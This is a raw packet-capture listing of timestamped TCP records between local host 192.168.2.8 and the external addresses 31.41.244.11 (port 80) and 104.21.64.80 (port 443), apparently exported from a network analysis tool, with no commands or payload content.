Dec 18, 2024 13:38:38.278008938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.278062105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.278103113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.279335022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.279347897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.279359102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.279395103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.279423952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.288609982 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.289407015 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.289484024 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.289496899 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.290664911 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.290719032 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.290725946 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.293827057 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.293889999 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.293895006 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.302299023 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.302373886 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.302381039 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.352951050 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.400765896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.400868893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.400924921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.400976896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.401057959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.401110888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.401562929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.401614904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.402090073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.402141094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.402559042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.402607918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.403059959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.403112888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.403498888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.403549910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.403836012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.403883934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.404289961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.404341936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.404812098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.404860973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.404867887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.404905081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.405813932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.405869007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.406300068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.406352043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.406805038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.406817913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.406858921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.407915115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.407972097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.408324957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.408375025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.408916950 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.409800053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.409811974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.409856081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.410780907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.410794020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.410834074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.411720991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.411732912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.411784887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.412740946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.412754059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.412803888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.413712978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.413724899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.413769960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.414757013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.414813995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.415806055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.415818930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.415863991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.416908026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.416919947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.416965008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.417995930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.418009996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.418024063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.418057919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.418071032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.419024944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.419038057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.419084072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.419990063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.420001984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.420047998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.421099901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.421113014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.421154976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.422264099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.422276974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.422314882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.422342062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.423296928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.423310995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.423347950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.423362970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.424391031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.424407959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.424417973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.424443007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.424468994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.425513029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.425524950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.425569057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.426625013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.426636934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.426676989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.427678108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.427690983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.427735090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.428781986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.428795099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.428805113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.428832054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.428844929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.429896116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.429908991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.429960012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.431001902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.431015015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.431057930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.432123899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.432137012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.432183027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.433197975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.433211088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.433249950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.433279037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.434434891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.434448004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.434469938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.434484959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.434506893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.435703993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.435715914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.435759068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.435781002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.437098980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.437110901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.437155008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.437958956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.437973022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.438011885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.438040972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.438724995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.438738108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.438779116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.438792944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.439918041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.439932108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.439941883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.439973116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.439985991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.440953016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.440964937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.441004038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.441034079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.447489023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.447501898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.447562933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.448892117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.448904991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.448949099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.449940920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.449953079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.449992895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.450804949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.450818062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.450855970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.451853991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.451868057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.451910019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.453058004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.453071117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.453079939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.453103065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.453134060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.461555004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.461568117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.461734056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.462311983 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.462322950 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.462610960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.462621927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.462687969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.463366985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.463378906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.463417053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.463445902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.464592934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.464612007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.464646101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.464658022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.465775013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.465787888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.465836048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.466698885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.466711998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.466752052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.467367887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.467381001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.467425108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.481467009 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.481532097 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.481537104 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.489167929 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.489259958 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.489264965 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.489280939 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.489331007 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.489525080 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.489536047 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.489547014 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:38.489552021 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:38.592901945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.592981100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.593175888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.593223095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.593229055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.593275070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.593764067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.593811989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.594407082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.594453096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.594738007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.594782114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.595304012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.595364094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.595698118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.595741987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.595947981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.595990896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.596544027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.596596003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.597029924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.597044945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.597083092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.597908974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.597954988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.598423004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.598464012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.598939896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.598952055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.598994017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.600071907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.600121975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.600485086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.600527048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.600989103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.601001978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.601043940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.601967096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.601979971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.602014065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.602032900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.603096008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.603107929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.603137016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.603151083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.603941917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.603955030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.603991032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.604007959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.604978085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.604990005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.605020046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.605032921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.605927944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.605942965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.605978966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.606913090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.606925964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.606965065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.607978106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.607990980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.608033895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.608880043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.608906031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.608944893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.609973907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.609987974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.610023022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.610034943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.611330986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.611342907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.611373901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.611387014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.612076044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.612088919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.612129927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.613245964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.613259077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.613293886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.613306999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.614094973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.614106894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.614145994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.615415096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.615426064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.615463018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.616497993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.616512060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.616542101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.616554976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.617775917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.617789030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.617819071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.617831945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.618937969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.618952036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.618997097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.620014906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.620027065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.620070934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.620935917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.620950937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.620987892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.621014118 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.621857882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.621870995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.621906042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.621917963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.622661114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.622673988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.622714996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.623882055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.623894930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.623933077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.625246048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.625293016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.625313997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.625360012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.627036095 CET	80	49715	31.41.244.11	192.168.2.8
